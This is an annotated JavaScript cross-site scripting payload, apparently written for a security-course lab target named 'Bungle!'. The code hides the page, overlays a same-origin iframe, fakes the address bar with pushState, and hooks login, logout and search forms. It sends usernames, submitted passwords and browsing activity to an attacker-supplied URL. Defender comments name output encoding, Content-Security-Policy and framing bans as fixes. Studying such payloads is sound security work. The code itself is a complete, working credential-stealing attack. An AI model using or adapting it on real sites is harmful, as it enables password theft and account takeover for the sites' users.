// payload(attacker): script body written to run inside a page of the target site
// (the pushState titles below name it "Bungle!"). It replaces the visible page with
// a full-size iframe of the site's own root and reports navigation, search, login
// and logout activity, including the submitted password, to the URL in `attacker`.
// Defender view: every report is a GET to `attacker` whose query string carries
// event=, user=, pass=, uri=/url= fields, so it is visible in a browser network
// trace. The injection point is not shown on this page; output encoding at that
// point is the fix, and a Content-Security-Policy limiting script-src and
// connect-src, or a framing ban (frame-ancestors 'none' / X-Frame-Options: DENY),
// each removes a step this code relies on.
- function payload(attacker) {
// state: counter written into pushed history entries; states: URLs pushed alongside.
- var state = 1
- var states = [];
// log: prints the serialized event to the console and sends it to `attacker`
// as GET parameters.
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
// proxy: reports a page visit (event "nav").
- function proxy(href) {
- log({event: "nav", uri: href});
- }
// Hide the document while the DOM is replaced in the ready handler below.
- $("html").hide();
// login: reports the submitted username and password, then records "/" in the
// history bookkeeping.
- function login(u, p){
- log({event: "login", user: u, pass: p});
- //history.pushState({s: state}, "Bungle!", "/login");
- history.pushState({s: 0}, "Bungle!", "/");
- state += 1
- states.push("/")
- }
// logout: reports which user logged out, then records "/" the same way as login.
- function logout(u){
- log({event: "logout", user: u});
- //history.pushState({s: state}, "Bungle!", "/logout");
- history.pushState({s: 0}, "Bungle!", "/");
- state += 1
- states.push("/")
- }
// search: reports the search URL (adding the user name when it is non-empty) and
// pushes a history entry with the same search URL.
- function search(ss, u){
- if(u == "")
- log({event: "nav", url: "./search?q="+ss});
- else
- log({event: "nav", user: u, url: "./search?q="+ss});
- //history.pushState({s: state}, "Bungle!", "/search?q="+ss);
- history.pushState({s: state}, "Bungle!", "/search?q="+ss);
- state += 1
- states.push("/search?q="+ss)
- }
// On DOM ready: empty the body and overlay an absolutely positioned 100% x 100%
// iframe that loads the site's root, while this script keeps running in the parent.
// The pushState calls apparently keep the parent's address bar in step with what
// the iframe shows.
- $(function(){
- $("body").html("");
- var iframe = document.createElement("iframe");
- iframe.style.width = "100%";
- iframe.style.height = "100%";
- iframe.style.position = "absolute";
- document.body.appendChild(iframe);
- proxy("./");
- $("html").show()
- iframe.src = "./";
// Back/forward in the parent window: point the iframe at the URL stored for the
// popped entry and report it as a "nav" event.
- window.onpopstate = function(event){
- cs = history.state;
- if(history.length == 0) return
- var offset = cs.s - state
- iframe.contentDocument.location.href = states[cs.s];
- //iframe.contentWindow.history.go(-1)
- log({event: "nav", uri: states[cs.s]})
- state += offset
- }
// Initial history entry for the root page.
- history.pushState({s:state}, "", "/")
- states.push("/")
// Runs on each iframe load; the contentDocument access below only works because
// the framed page is same-origin with the parent.
- iframe.onload = function(){
// Removes #history-list links whose text contains "iframe"; presumably this hides
// the entry that would reveal the injected markup (confirm against the target page).
- $("iframe").contents().find("#history-list a:contains(\"iframe\")", this).remove()
// One-shot delegated submit hook: cancel the submission, report the form's fields
// according to its action, then submit the form again so it proceeds normally.
- $("body", this.contentDocument).one("submit", "form", function(event){
- event.preventDefault();
- event.stopPropagation();
- switch($(this).attr("action")){
- case "./login":
- login($("#username", this).val(), $("#userpass", this).val());
- break;
- case "./logout":
- logout($("#logged-in-user", this).text());
- break;
- case "./search":
- search($("#query", this).val(), $("iframe").contents().find("#logged-in-user", this).text());
- break;
- }
- $(this).submit();
- });
// "Search again" button: report a return to the root and push a history entry.
- $("iframe").contents().find("#search-again-btn", this).click(function(){
- proxy("./")
- history.pushState({s: state}, "Bungle!", "/");
- state += 1
- states.push("/")
- })
- }
- });
- }